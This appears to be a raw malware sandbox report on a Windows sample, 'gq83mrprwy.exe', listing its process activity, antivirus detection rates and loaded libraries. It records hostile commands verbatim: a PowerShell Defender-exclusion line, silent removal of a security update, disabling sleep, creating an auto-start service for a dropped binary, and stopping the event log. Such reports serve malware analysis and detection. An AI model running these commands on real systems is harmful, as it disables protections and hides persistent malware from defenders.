Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\Desktop\gq83mrprwy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gq83mrprwy.exe	ReversingLabs: Detection: 63%
Source: gq83mrprwy.exe	Virustotal: Detection: 55%

Source: C:\Users\user\Desktop\gq83mrprwy.exe

File read: C:\Users\user\Desktop\gq83mrprwy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gq83mrprwy.exe "C:\Users\user\Desktop\gq83mrprwy.exe"
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CENLNOGJ"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CENLNOGJ"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CENLNOGJ"	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CENLNOGJ"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
